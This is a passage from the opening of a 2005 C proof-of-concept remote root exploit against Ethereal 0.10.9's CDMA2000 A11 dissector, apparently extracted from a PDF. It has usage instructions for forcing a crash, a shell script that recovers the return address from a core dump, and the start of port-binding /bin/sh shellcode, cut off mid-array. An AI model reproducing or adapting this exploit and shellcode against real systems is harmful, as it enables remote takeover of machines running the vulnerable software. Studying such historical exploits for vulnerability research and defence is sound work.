1 /*
2 * Ethereal 0.10.9 and below proof−of−concept remote root exploit
3 * (c) 2005 Diego Giagio <dgiagio@irion.com.br>
4 *
5 * The CDMA2000 A11 protocol dissector (packet−3g−a11.c) has a stack overflow
6 * vulnerability when decoding Airlink records. This vulnerability was also
7 * discovered by Diego Giagio on 01/March/2005. The vendor was imediatelly
8 * contacted.
9 *
10 *
11 * Notes:
12 *
13 * This program has only been tested on Linux.
14 *
15 * If your system isn’t on the target list and you are running Linux (x86), you
16 * can easily find your system’s ret address. See below:
17 *
18 * First you need to force Ethereal dump a core file.
19 * bash$ ./ethereal−g3−a11 −a 0xdeadbeef −s 1 −d <your_machine_ip> −p 65535
20 *
21 * Then, use the script below to find the ret address from the core file:
22 * −−snip−−
23 * #!/bin/sh
24 *
25 * ADDR=‘objdump −D −s core | \
26 * grep "90909090 90909090 90909090 90909090" | \
27 * head −2 | tail −1 | awk ’{print 0x$1}’‘
28 * echo "Address: 0x$ADDR"
29 * −−snip−−
30 *
31 * Use that address with the −a <address> option. Good luck.
32 *
33 *
34 * Greets:
35 *
36 * ttaranto, eniac, rogbas, pjoppert, skylazart, cync, runixd,
37 * surfer, setnf, cbc, SUiCiDE, _hide, Codak, dm_, nuTshell
38 *
39 * #buffer@ircs.ircsnet.net
40 *
41 */
42
43 #include <stdio.h>
44 #include <unistd.h>
45 #include <sys/types.h>
46 #include <sys/socket.h>
47 #include <netinet/in.h>
48 #include <errno.h>
49
50 /*
51 * portbind, execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
52 */
Page 1/15
Ethereal 0.10.9 3GA11 Remote Buffer Overflow Exploit
Diego Giagio
03/14/2005
53 char sc_portbind[] =
54 "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d\x08"
55 "\xb0\x66\xcd\x80\x89\x45\x08\x43\x89\x5d\x14\x66\xc7\x45\x16\xff\xff\x31"
56 "\xc0\x89\x45\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80"
57 "\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0"
58 "\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x4